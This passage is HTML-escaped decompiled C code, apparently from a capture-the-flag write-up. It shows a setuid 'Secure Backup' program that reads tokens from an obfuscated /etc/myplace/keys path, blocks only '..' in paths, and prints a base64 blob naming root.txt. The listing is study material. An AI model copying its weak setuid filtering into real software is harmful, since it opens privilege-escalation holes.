&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">name&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">1000&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+5DDh] [ebp-AD5h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">v11&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">500&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+9C5h] [ebp-6EDh] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">s&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">1000&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+BB9h] [ebp-4F9h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">filename&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">100&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+FA1h] [ebp-111h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">v14&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">6&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+1005h] [ebp-ADh] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">v15&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+100Bh] [ebp-A7h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="n">_BYTE&lt;/span> &lt;span class="n">v16&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">6&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+100Eh] [ebp-A4h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">v17&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">6&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+1014h] [ebp-9Eh] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">v18&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">6&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+101Ah] [ebp-98h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">src&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+1020h] [ebp-92h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">char&lt;/span> &lt;span class="n">dest&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">100&lt;/span>&lt;span class="p">];&lt;/span> &lt;span class="c1">// [esp+1022h] [ebp-90h] BYREF
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">int&lt;/span> &lt;span class="n">v21&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// [esp+1086h] [ebp-2Ch]
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="n">FILE&lt;/span> &lt;span class="o">*&lt;/span>&lt;span class="n">stream&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// [esp+108Ah] [ebp-28h]
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">int&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// [esp+108Eh] [ebp-24h]
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">int&lt;/span> &lt;span class="n">v24&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// [esp+1092h] [ebp-20h]
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">int&lt;/span> &lt;span class="n">v25&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// [esp+1096h] [ebp-1Ch]
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span> &lt;span class="kt">int&lt;/span> &lt;span class="o">*&lt;/span>&lt;span class="n">p_argc&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="c1">// [esp+10A2h] [ebp-10h]
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">p_argc&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">argc&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v3&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nf">geteuid&lt;/span>&lt;span class="p">();&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">setuid&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v3&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v25&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v24&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">argc&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">3&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strcmp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;-q&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v24&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="se">\n\n\n&lt;/span>&lt;span class="s"> ____________________________________________________&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; / &lt;/span>&lt;span class="se">\\&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | _____________________________________________ |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | Secure Backup v1.0 | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | | | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | |_____________________________________________| |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; | |&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; &lt;/span>&lt;span class="se">\\&lt;/span>&lt;span class="s">_____________________________________________________/&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; &lt;/span>&lt;span class="se">\\&lt;/span>&lt;span class="s">_______________________________________/&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; _______________________________________________&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; _-&amp;#39; .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; _-&amp;#39;.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; _-&amp;#39;.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; _-&amp;#39;.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34; _-&amp;#39;.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;:-----------------------------------------------------------------------------:&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;`---._.-----------------------------------------------------------------._.---&amp;#39;&lt;/span>&lt;span class="se">\n\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strncpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dest&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="mh">0x64u&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">src&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;/&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v14&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;/e&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v14&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;tc&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v15&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">src&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">*&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">_WORD&lt;/span> &lt;span class="o">*&lt;/span>&lt;span class="p">)&lt;/span>&lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v15&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nf">strlen&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v15&lt;/span>&lt;span class="p">)]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">109&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v16&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;yp&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v16&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;la&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v17&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;ce&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v17&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="n">src&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">*&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">_WORD&lt;/span> &lt;span class="o">*&lt;/span>&lt;span class="p">)&lt;/span>&lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v17&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nf">strlen&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v17&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">])&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="mi">3&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">107&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">v18&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;ey&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v18&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;s&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcpy&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">filename&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">v14&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">for&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">8&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="o">++&lt;/span>&lt;span class="n">i&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">strcat&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">filename&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="o">&amp;amp;&lt;/span>&lt;span class="n">v14&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span> &lt;span class="o">*&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">stream&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nf">fopen&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">filename&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;r&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="o">!&lt;/span>&lt;span class="n">stream&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v24&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displayWarning&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Could not open file&lt;/span>&lt;span class="se">\n\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">while&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">fgets&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">s&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">1000&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">stream&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">s&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nf">strcspn&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">s&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">)]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">0&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="o">!&lt;/span>&lt;span class="nf">strcmp&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">dest&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">s&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">v25&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v24&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Validated access token&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v25&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="n">v24&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">1&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displayWarning&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Ah-ah-ah! You didn&amp;#39;t say the magic word!&lt;/span>&lt;span class="se">\n\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">exit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span> &lt;span class="nf">strstr&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">],&lt;/span> &lt;span class="s">&amp;#34;..&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">displaySuccess&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;Finished! Encoded backup is below:&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nf">puts&lt;/span>&lt;span class="p">(&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="s">&amp;#34;UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS&amp;#34;&lt;/span>
